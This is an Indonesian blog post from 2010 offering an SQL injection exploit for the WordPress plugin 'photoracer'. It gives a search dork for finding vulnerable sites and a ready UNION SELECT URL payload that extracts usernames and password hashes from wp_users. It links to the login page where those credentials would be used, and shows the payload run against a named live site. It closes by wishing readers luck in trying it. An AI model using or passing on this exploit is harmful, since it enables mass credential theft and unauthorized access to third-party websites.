PrOReBeLL: WORDPRESS v1.0 SQL Injection Vulnerability

Sabtu, 11 September 2010

WORDPRESS v1.0 SQL Injection Vulnerability

Dork : inurl:"wp-content/plugins/photoracer/viewimg.php?id="

########################################################

Exploit :
http://[site]/wp-content/plugins/photoracer/viewimg.php?id={SQLI}

EXAM: http://[site]/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

PAGE LOGIN : http://[site]/wp-login.php

Testing : http://powersimages.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

Selengkapnya :

Thank's : Devilzc0de Team

Selamat Mencoba...

PrOReBeLL

Sabtu, 11 September 2010

WORDPRESS v1.0 SQL Injection Vulnerability

Tidak ada komentar:

Posting Komentar